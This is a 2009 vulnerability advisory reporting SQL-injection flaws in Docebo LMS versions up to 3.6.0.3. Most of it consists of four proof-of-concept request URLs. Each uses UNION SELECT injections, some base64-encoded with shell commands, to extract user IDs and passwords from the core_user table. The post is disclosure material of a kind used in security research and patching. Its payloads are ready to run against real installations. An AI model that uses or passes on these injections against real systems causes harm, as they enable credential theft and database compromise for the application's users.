Docebo multiple vulnerabilities

SQL-Injection.

Posted by Andrea Fabrizi on October 22, 2009

Docebo <=3.6.0.3 is prone to multiple SQL-injection vulnerabilities as it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

POC 1

[email protected]:~$ echo -n "' union select userid,pass from core_user -- " | base64
JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g

http://localhost/docebo/doceboLms/index.php?modname=faq&op=play&mode=help&word=JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g

POC 2

[email protected]:~$ echo -n "' union select 1,userid,pass from core_user -- " | base64
JyB1bmlvbiBzZWxlY3QgMSx1c2VyaWQscGFzcyBmcm9tIGNvcmVfdXNlciAtLSA=

http://localhost/docebo/doceboLms/index.php?modname=link&op=play&mode=keyw&word=JyB1bmlvbiBzZWxlY3QgMSx1c2VyaWQscGFzcyBmcm9tIGNvcmVfdXNlciAtLSA=

POC 3

http://localhost/docebo/doceboCore/index.php?modname=meta_certificate&op=elemmetacertificate&id_certificate=3222 union select concat (userid,0x3d,pass),2,3 from core_user limit 1,2

POC 4

http://localhost/docebo/doceboCore/index.php?modname=certificate&op=elemcertificate&id_certificate=1123 union select concat(userid,0x3d,pass),2,3 from core_user limit 1,2

BID: http://www.securityfocus.com/bid/36654/info